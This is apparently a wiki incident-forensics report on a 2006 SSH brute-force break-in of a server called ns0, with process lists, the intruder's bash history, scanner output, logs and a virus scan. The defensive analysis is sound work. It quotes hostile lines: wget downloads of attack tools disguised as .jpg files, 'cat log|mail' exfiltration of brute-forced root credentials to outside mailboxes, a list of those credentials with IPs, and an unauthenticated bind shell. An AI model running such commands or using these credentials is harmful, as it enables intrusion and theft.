Forensics on Incident 1
Jump to navigation
Jump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
Breach in ns0 @ e..oss
Analysis
ps auwx: 2006/03/17 +-20:20
========
test 30731 0.0 0.0 676 284 ? S 00:21 0:00 ./ntpd
test 31116 0.0 0.2 2944 1360 ? Ss 00:28 0:00 SCREEN
test 31117 0.0 0.2 3000 1228 pts/5 Ss 00:28 0:00 /bin/bash
test 31134 0.0 0.2 3164 1368 pts/5 S+ 00:29 0:00 /bin/bash
test 32352 0.0 0.0 1444 280 ? Ss 00:43 0:00 ./go
test 25680 0.0 0.2 2944 1412 ? Ss 09:03 0:00 SCREEN
test 25681 0.0 0.3 3000 1656 pts/6 Ss 09:03 0:00 /bin/bash
test 25717 0.0 0.3 3160 1748 pts/6 S+ 09:03 0:00 /bin/bash
test 4132 0.0 0.0 1344 204 pts/5 T+ 10:40 0:00 ./go
test 4135 0.0 0.0 0 0 pts/5 Z+ 10:40 0:00 [go] <defunct>
test 3211 0.0 0.0 1344 240 pts/5 T+ 20:05 0:00 ./go
test 3224 0.0 0.0 0 0 pts/5 Z+ 20:05 0:00 [go] <defunct>
test 4088 0.0 0.2 2704 1260 pts/6 S+ 20:35 0:00 /bin/bash ./assh 24.35
test 4089 49.4 0.0 1492 456 pts/6 R+ 20:35 4:43 ./pscan2 24.35 22
test 4090 0.0 0.0 0 0 pts/6 Z+ 20:35 0:00 [pscan2] <defunct>
test 4097 0.0 0.2 2704 1260 pts/5 S+ 20:35 0:00 /bin/bash ./assh 200.56
test 4098 49.4 0.0 1492 456 pts/5 R+ 20:35 4:43 ./pscan2 200.56 22
test 4099 0.0 0.0 0 0 pts/5 Z+ 20:35 0:00 [pscan2] <defunct>
Screens:
========
test@ns0:/root$ screen -ls
screen -r test/
There are screens on:
31116.pts-4.ns0 (Detached)
25680.pts-4.ns0 (Detached)
2 Sockets in /var/run/screen/S-test.
test@ns0:/root$ screen -r 31116
First screen:
=============
Copy of the current page:
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.58.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.59.112.* (total: 0) (43.9% done)
Second screen:
==============
Copy of the full screen buffer:
test@ns0:/var/tmp/.. /dan$
test@ns0:/var/tmp/.. /dan$ ls
200 assh gen-pass.sh pass_file sshf
200.221.pscan.22 auto go pscan2 ssh-scan
200.59.pscan.22 common go.sh ss vuln.txt
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.37.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.38.136.* (total: 0) (53.3% done)
test@ns0:/var/tmp/.. /2$ ./auto
Enter A class range
24
Enter output file
24
test@ns0:/var/tmp/.. /2$ chmod +x 24
test@ns0:/var/tmp/.. /2$ ./24
######################################################
# Compiled By D-a-N #
#----------------------------------------------------#
# Scaner Privat #
#----------------------------------------------------#
######################################################
...
Bash history:
=============
Ran history in screen 25680.pts-4.ns0:
test@ns0:/var/tmp/.. /2$ history
48 first line identical to .bash_history then
49 ./auto
50 chmod +x 24
51 ./24
Content of .bash_history:
ls
cd
ls
wget
wget rzv69.marte.ro/rzv69.tgz
tar zxvf rzv69.tgz
ls
del 404
wget fire.prohosting.com/claubuc/scaner.jpg
tar xzvf scaner.jpg
cd scaner
./assh 207.44
ls
./auto 207.44
./assh 213.186
cd /var/tmp
cd .." "
screen
w
passwd
w
cd /var/tmp
ls -a
cd /home/test/
ls -a
cd scaner
ls -a
cat vuln.txt
cd /var/tmp
cat /etc/hosts
su vinoj
su vinoj
su trollingsecours
su trollingsecours
su trollingsecours
cd /var/tmp
ls -a
mkdir .." "
cd .." "
wget fire.prohosting.com/scarlatu/dan.jpg
wget fire.prohosting.com/scarlatu/psy.jpg
tar xzvf psy.jpg
cd .bash
./ntpd
cd ..
tar xzvf dan.jpg
cd dan
screen
ls -a
./go.sh 200.41
./assh 200.41
exit
w
screen -r
screen -r 30860.pts-2.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd dan
pico vuln.txt
rm -rf vuln.txt
touch vuln.txt
cd ..
tar xzvf dan.jpg
ls -a
cd dan
ls -a
cd ..
mv dan 1
tar xzvf dan.jpg
mv dan 2
mv 1 dan
ls -a
cd 2
screen
screen -r
screen -r 30860.pts-2.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
cd /var/tmp
cd .." "
cd 2
pico vuln.txt
cd ..
cd dan
pico vuln.txt
cat vuln.txt
clear
w
screen -r
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
ls -a
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
crontab -e
Tools:
======
* Attempt to download rzv69.marte.ro/rzv69.tgz, err 404
* Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz)
* Romanian scripts
* Compiled By D-a-N
* cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools)
* cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools)
Scans:
======
* scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186
Netstat Abstract: (within the 800 simultaneous scans)
tcp 0 1 213.186.53.59:59930 24.35.236.71:22 SYN_SENT 4089/pscan2
tcp 0 1 213.186.53.59:60352 200.56.236.93:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60288 200.56.236.29:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60424 200.56.236.165:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60233 200.56.235.229:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60169 200.56.235.165:22 SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60095 200.56.235.91:22 SYN_SENT 4098/pscan2
IRC:
====
* Connection to IRC(6667) with psyBNC(ntpd) to 195.204.1.130
** = oslo1.no.eu.undernet.org
Netstat:
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 30731/ntpd
tcp 0 0 213.186.53.59:34227 195.204.1.130:6667 ESTABLISHED30731/ntpd
Diffs between the downloaded tool and the hacker's version:
--- log/psybnc.log 1970-01-01 01:00:00.000000000 +0100
+++ log/psybnc.log 2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,15 @@
+Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667
+Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731)
+Fri Mar 17 00:21:14 :Loading all Users..
+Fri Mar 17 00:21:14 :No Users found.
+Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan)
+Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de dan
+Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat
+Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 ().
+Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 ()
+Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined)
+Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 ().
+Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 ()
+Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net)
--- motd/USER1.MOTD 1970-01-01 01:00:00.000000000 +0100
+++ motd/USER1.MOTD 2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,71 @@
+:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL
+:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07
+:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST
+:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov
+:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server
+:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server
+:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers
+:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online
+:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s)
+:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed
+:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers
+:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day -
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Welome to Oslo*.NO.EU.undernet.org
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Disclaimer / Rules
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Irc is an umoderated international medium. Cloning is
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- strictly forbidden on this server, any clones will
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not be tolerated. Mass Messaging / Mass Invites are not
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- allowed on any Undernet server, any offenders will be killed.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Using this server means you agree to all of its rules and the
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- rules of Undernet. If you cannot agree to this then /quit now.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Server contact info:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- E-mail : oslo@undernet.org
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> News:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.05.2005]
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are out of news.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.12.2004]
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We shut down the channel #banetele. Most of the users in there needed
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- reop/channel related helping and we have #nastrand for that. For info
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not related to channel/user problems, email oslo@undernet.org.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [26.08.2003]
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are back online :)
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Thank you to our provider www.banetele.com for all help!
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Ports:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 6666, 6667, 6668, 7000
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Bot Policies:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- It is allowed to run NON abusive bots on this server, all abusive
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- bots will be killed on sight.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Undernet has Cservice. Go to http://cservice.undernet.org
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- or #Cservice if you have any questions.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Help Channels:
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #nastrand -> Oper/IRC Help
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #cservice -> Cservice questions
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #mIRC -> For mIRC questions
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #vh -> For help with viruses
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #helpchan -> IRC Help
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Please notice that these channels are not administrated by the
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- oslo.* crew and we and/or the server sponsors can not be held
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- responsible for actions taken or info given in the channels.
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> AGAIN .. READ THIS !!
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING!
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- The use of this server is no right, but a privilege. The admin(s)
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- and opers can revoke this priviledge without further notice and
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- without a reason.
+:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command.
--- psybnc.conf 2003-04-07 14:47:00.000000000 +0200
+++ psybnc.conf 2006-03-19 23:32:53.000000000 +0100
@@ -1,3 +1,25 @@
PSYBNC.SYSTEM.PORT1=6667
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
+USER1.USER.LOGIN=dan
+USER1.USER.USER=x
+USER1.USER.PASS==0x'q'0'W`2'S0I'F`x
+USER1.USER.RIGHTS=1
+USER1.USER.VLINK=0
+USER1.USER.PPORT=0
+USER1.USER.PARENT=0
+USER1.USER.QUITTED=0
+USER1.USER.DCCENABLED=1
+USER1.USER.AUTOGETDCC=0
+USER1.USER.AIDLE=0
+USER1.USER.LEAVEQUIT=0
+USER1.USER.AUTOREJOIN=1
+USER1.USER.SYSMSG=1
+USER1.USER.LASTLOG=0
+USER1.USER.NICK=D-a-N
+USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org
+USER1.SERVERS.PORT2=6667
+USER1.SERVERS.SERVER2=195.204.1.130
+USER1.SERVERS.PORT1=6667
+USER1.CHANNELS.ENTRY1=#porumbei
+USER1.CHANNELS.ENTRY0=#xibit
Backdoor:
=========
* ./go opens port 19876 with a shell without auth
cf http://www.2701.org/archive/200311240000.html
Netstat:
tcp 0 0 0.0.0.0:19876 0.0.0.0:* LISTEN 32352/go
* ./ss
cf http://www.securiteam.com/tools/5EP0B0ADFO.html
Fast SYN Scanner (libnet, libpcap) 11 Jul. 2004
Credit:
The information has been provided by Doctor BIOS.
The following tool is a fast SYN scanner written in C.
vuln.txt:
=========
cf http://www.lockeddown.net/rst-expl.txt
ssh brute-force:
================
ssh-scan and sshf
./sshf <procese adika cate de alea deodata incerc>
~= how many processes to run together
/etc/passwd:
============
test:x:1024:1024:,,,:/home/test:/bin/false
mails:
======
cat /etc/passwd
/sbin/ifconfig |grep inet
cat /etc/hosts
uname -a
w
ping -c 3 www.yahoo.com
cat vuln.txt
chmod +x go
./go
139P Received: from test by ns0.exxoss.com with local (Exim 4.50)
for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100
023T To: usdpower@yahoo.com
023 Subject: linux-printer
047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com>
034F From: ",,," <test@ns0.exxoss.com>
038 Date: Fri, 17 Mar 2006 17:35:14 +0100
To-be-Mailed data:
administrator:administrator:24.16.169.218
guest:guest:24.16.169.218
test:test:24.3.178.253
mysql:mysql:200.27.145.74
root:admin1:200.31.199.77
root:password:24.8.131.152
root:secure:24.11.225.20
root:123456:200.32.86.228
root:1234567890:200.32.86.228
root:admin1:200.32.86.228
root:admin:200.32.86.228
root:administrator1:200.32.86.228
root:backup:200.32.86.228
root:passwd:200.32.86.228
root:password123:200.32.86.228
root:password:200.32.86.228
root:qwerty:200.32.86.228
root:root1:200.32.86.228
root:root:200.32.86.228
root:rootroot:200.32.86.228
root:secret:200.32.86.228
root:secure:200.32.86.228
root:administrator:200.32.86.228
(honeypot probably)
RST virus:
==========
Quick and dirty way to find infected files: find . -type f -exec strings --all {} \; |grep snortdos
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/scaner/go Infection: Unix/RST.B
/tmp/scaner/pscan2 Infection: Unix/RST.B
/tmp/scaner/ss Infection: Unix/RST.B
/tmp/scaner/ssh-scan Infection: Unix/RST.B
/tmp/scaner/sshf Infection: Unix/RST.B
Results of virus scanning:
Infected: 5
Seems that infected files are updating them at each run and modify the timestamp
/home/test/scaner:
23714 2006-03-06 23:23 go
25503 2005-05-06 19:00 pscan2
458068 2006-03-07 00:03 ss
846520 2006-03-07 00:03 sshf
846832 2006-03-06 23:12 ssh-scan
/var/tmp/.. /2:
23714 2006-03-17 21:17 go
25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan
/var/tmp/.. /dan:
23714 2006-03-17 10:35 go
25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan
21:17 corresponds to the crash of the server so probably infected executables are left open even after being killed
Note: same virus present also in:
/ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND
/ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND
TIMELINE:
=========
2006/02/16 08:58:08 82.79.137.30 vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client "82.79.137.30"
Mar 6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be
Mar 6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2
Mar 6 12:29:31 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
Mar 06 06 12:30:50 4096 m.c drwxr-xr-x root root /etc/webmin
639 m.c -rw------- root root /etc/webmin/miniserv.conf
Mar 6 12:31:05 localhost webmin[31297]: Webmin starting
Mar 6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be
2006/03/06 13:48:47 82.79.137.24 * vsftpd: Mon Mar 6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client "82.79.137.24"
Mar 03 06 15:53:30 21 m.c -rw-r----- root shadow /etc/webmin/miniserv.users
Mar 03 06 16:11:31 4096 m.c drwxr-xr-x root root /etc/exim4
7838 m.c -rw-r--r-- root root /etc/exim4/exim4.conf
Mar 6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2
Mar 6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2
Mar 6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
Mar 6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2
dorian12 pts/2 217.117.45.148 Mon Mar 6 21:38 - 21:40 (00:01)
Mar 6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2
Mar 6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
2006/03/06 22:27:30 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:27:31 82.79.137.26 26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:28:16 82.79.137.27 Mar 6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/06 22:28:18 82.79.137.27 vsftpd: Mon Mar 6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client "82.79.137.27"
2006/03/06 22:28:18 82.79.137.18 Mar 6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18
2006/03/06 22:28:20 82.79.137.18 vsftpd: Mon Mar 6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client "82.79.137.18"
2006/03/06 22:28:29 82.79.137.25 * vsftpd: Mon Mar 6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client "82.79.137.25"
2006/03/06 22:28:30 82.79.137.14 * vsftpd: Mon Mar 6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client "82.79.137.14"
2006/03/06 22:28:39 82.79.137.22 Mar 6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro user=test
2006/03/06 22:28:41 82.79.137.22 Mar 6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro
2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2
2006/03/06 22:28:43 82.79.137.22 * Mar 6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0)
2006/03/06 22:28 82.79.137.22 * test pts/2 82.79.137.22 Mon Mar 6 22:28 - 00:21 (01:52)
2006/03/06 22:31:06 82.79.137.18 Mar 6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18
2006/03/06 23:29:14 82.79.137.7 * vsftpd: Mon Mar 6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/06 22:40:54 82.79.137.22 *! Mar 06 06 22:40:54 167818 m.. -rw-r--r-- test test /home/test/scaner/207.44.pscan.22
2006/03/06 23:12:35 82.79.137.22 *! Mar 06 06 23:12:35 846832 m.. -rwxr-xr-x test test /home/test/scaner/ssh-scan
2006/03/06 23:23:56 82.79.137.22 *! Mar 06 06 23:23:56 23714 m.. -rwxr-xr-x test test /home/test/scaner/go
2006/03/06 00:03:34 82.79.137.22 *! Mar 07 06 00:03:34 846520 m.. -rwxr-xr-x test test /home/test/scaner/sshf
2006/03/06 00:03:34 82.79.137.22 *! 4096 m.. drwxr-xr-x test test /home/test/scaner
2006/03/06 00:03:34 82.79.137.22 *! 458068 m.. -rwxr-xr-x test test /home/test/scaner/ss
skycode pts/3 213.186.53.55 Tue Mar 7 00:14 - down (00:45)
2006/03/07 00:21:24 82.79.137.22 * Mar 7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test
skycode pts/2 213.186.53.55 Tue Mar 7 00:58 - down (00:01)
runlevel (to lvl 6) Tue Mar 7 00:59 - 00:59 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 00:59 - 01:02 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386
skycode pts/0 Tue Mar 7 01:04 - 01:04 (00:00) 213.186.53.55
skycode pts/0 Tue Mar 7 08:28 - down (00:16) 213.186.53.55
runlevel (to lvl 6) Tue Mar 7 08:45 - 08:45 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 08:45 - 08:48 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386
skycode pts/0 Tue Mar 7 08:56 - down (00:22) 213.186.53.55
skycode pts/1 Tue Mar 7 09:17 - down (00:01) 213.186.53.55
runlevel (to lvl 6) Tue Mar 7 09:18 - 09:18 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:18 - 09:22 (00:03) 2.4.27-2-386
reboot system boot Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386
skycode pts/0 Tue Mar 7 09:23 - down (00:01) 217.136.140.81
runlevel (to lvl 6) Tue Mar 7 09:25 - 09:25 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:25 - 09:28 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:28 - 09:44 (00:15) 2.4.27-2-386
skycode pts/0 Tue Mar 7 09:34 - down (00:09) 217.136.140.81
runlevel (to lvl 6) Tue Mar 7 09:44 - 09:44 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:44 - 09:48 (00:04) 2.4.27-2-386
reboot system boot Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 09:48 - 01:03 (12+15:14) 2.4.27-2-386
2006/03/09 14:57:31 82.79.137.27 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5545] [test] OK LOGIN: Client "82.79.137.27"
2006/03/09 14:57:31 82.79.137.26 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5541] [test] OK LOGIN: Client "82.79.137.26"
2006/03/09 14:57:31 82.79.137.28 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5543] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:31 82.79.137.7 * vsftpd: Thu Mar 9 14:57:31 2006 [pid 5547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/09 14:57:33 82.79.137.28 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5561] [test] OK LOGIN: Client "82.79.137.28"
2006/03/09 14:57:33 82.79.137.30 * vsftpd: Thu Mar 9 14:57:33 2006 [pid 5563] [test] OK LOGIN: Client "82.79.137.30"
